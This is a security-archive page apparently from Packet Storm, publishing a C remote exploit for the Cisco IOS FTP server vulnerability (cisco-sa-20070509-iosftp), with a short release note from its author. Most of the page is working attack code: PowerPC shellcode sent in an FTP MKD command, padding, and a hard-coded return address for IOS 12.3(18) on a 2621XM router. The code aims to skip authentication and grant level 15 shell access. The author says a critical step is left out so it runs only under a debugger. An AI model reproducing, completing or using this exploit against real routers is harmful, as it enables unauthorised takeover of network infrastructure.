exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco Security Advisory 20070509-iosftp.c

Cisco Security Advisory 20070509-iosftp.c
Posted Jul 29, 2008
Authored by Cisco Systems, Andy Davis

Cisco IOS FTP server remote exploit that escalates privileges to level 15. Specific hard-coded addresses are for IOS 12.3(18) on a 2621XM router. Slightly crippled forcing this to only work when the router is connected to a debugger.

tags | exploit, remote
systems | cisco
SHA-256 | d54246014babb4c769cae5fee17eb1d8d2663d37a25a025002299897d93a764a

Cisco Security Advisory 20070509-iosftp.c

Change Mirror Download
Hi,

The IOS FTP server vulnerabilities were published in an advisory by
Cisco in May 2007. The FTP server does not run by default, it is not
widely used and has since been removed from new versions of IOS.
Therefore, I took the decision to release this exploit code in order
to show that IOS can be reliably exploited to provide remote level 15
exec shell access. This clearly demonstrates that patching your router
is just as important as patching your servers.

To prevent its widespread abuse I have omitted a critical step which
means that it will only work when the router is connected to a
debugger - not something you are likely to encounter on the Internet

Anyway, hopefully this will promote further IOS security research as
there's plenty left to look at!

Cheers,

Andy




/*

Cisco IOS FTP server remote exploit by Andy Davis 2008

Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007

Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router

Removes the requirement to authenticate and escalates to level 15

*********************************************************************
To protect the innocent a critical step has been omitted, which means
the shellcode will only execute when the router is attached to gdb.
I'm sure the PowerPC shellcoders out there will work it out...
*********************************************************************

Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
on the original IOS security research

iosftpexploit <at> googlemail 'dot' com

*/

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>

#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60 # pointer to VTY info */
/* .equ terminate, 0x80e4086c # kill a process */

"\x3c\x80\x81\x83" /* lis 4,vty_info@ha */
"\x38\x84\xda\x60" /* la 4,vty_info@l(4) */
"\x7d\x08\x42\x78" /* xor 8,8,8 */
"\x7c\xe4\x40\x2e" /* lwzx 7,4,8 */
"\x91\x07\x01\x74" /* stw 8,372(7) */
"\x39\x08\xff\xff" /* subi 8,8,1 */
"\x38\xe7\x09\x1a" /* addi 7,7,233 */
"\x91\x07\x04\xca" /* stw 8,1226(7) */
"\x7d\x03\x43\x78" /* mr 3,8 */
"\x3c\x80\x80\xe4" /* lis 4,terminate@ha */
"\x38\x84\x08\x6c" /* la 4,terminate@l(4) */
"\x7c\x89\x03\xa6" /* mtctr 4 */
"\x4e\x80\x04\x20" /* bctr */

/* exists cleanly without adversely affecting the FTP server */

"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */

"\x80\x06\x23\xB8" /* return address */
"\x0d\x0a";

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8 lwz 26, 20(26)
0x800623BC mtctr 26
0x800623C0 mr 3, 27
0x800623C4 bctrl
*/

unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
{
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");

printf ("\nUsage: %s <target IP address>\n",argv[0]);
exit(-1);
}

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
{
printf("Error sending packet...quitting\n\n");
exit (1);
}
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close